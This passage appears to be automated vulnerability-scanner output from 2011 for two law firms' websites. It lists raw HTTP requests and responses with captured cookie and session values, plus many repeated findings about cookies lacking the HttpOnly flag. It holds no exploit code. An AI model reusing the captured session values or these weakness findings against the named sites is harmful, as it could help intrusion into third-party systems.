GET /languages HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:51:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A51%3A50%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1351%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:51:50 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/act_ticker_xml.cfm HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/fjLib/media/flash/news/newsTicker.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/ Content-Type: text/xml
<images>
<item> <news>Fulbright Partner Named Best FCPA Lawyer Outside of D.C.</news> <url>http://www.fulbright.com/index.cfm?fuseaction=news.detail&article_id=9405&site_id=286< ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /newsTicker.swf HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/dc Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:46 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /newyork HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:55:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A55%3A29%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2404%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:55:29 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /offices HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:51:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A51%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1160%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:51:14 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rss HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1602%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:42 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /seminars/act_eventbanner_xml.cfm HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/fjLib/media/flash/events/eventsBanner_03.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/ Content-Type: text/xml
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /technology HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D393%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.hoganlovells.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AboutUs/Online_Client_Service/Overview/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
...var enterKeyButtonSearch = ""; var typeAheadParentID = ""; var typeAheadList = "#nameTypeAhead"; var AttorneyTypeAheadWS = "/FCWSite/HoganHartsonWS/HHWebServices.asmx"; var disableTypeAheadBlur ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
//v1.7 // Flash Player Version Detection // Detect Client Browser type // Copyright 2005-2007 Adobe Systems Incorporated. All rights reserved. var isIE = (navigator.appVersion.indexOf("MSIE") != ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
...// Styles for browser specific versions. document.writeln("<style type=\"text/css\">"); // Not IE Browsers if (!$.browser.msie) { document.writeln("body .header .topnav ul li.on {background ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
// SpamProof jscript methods //To be used to prevent spammers from grabbing email addresses from a website // //Example: //For more information contact our <Script language="JavaScript">PrintMail( ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aboutus/history/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aboutus/overview/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><meta name="description" content="Hogan Lovells is a law firm that sees the whole picture an ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /de/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /es/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fr/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The following cookie was issued by the application and does not have the HttpOnly flag set:
DefaultCulture=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* Copyright (c) 2008, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo.net/yui/license.txt version: 2.6.0 */ YAHOO.util.Color=function(){var A="0123456789A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* Copyright (c) 2008, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo.net/yui/license.txt version: 2.6.0 */ (function(){YAHOO.util.Config=function(D){if(D ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* Copyright (c) 2008, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo.net/yui/license.txt version: 2.6.0 */ YAHOO.widget.Slider=function(C,A,B,D){YAHOO.wi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* Copyright (c) 2008, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo.net/yui/license.txt version: 2.6.0 */ if(typeof YAHOO=="undefined"||!YAHOO){var YAHO ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /industries/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><meta name="description" content="Hogan Lovells depth of experience, global reach, and compr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ja/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
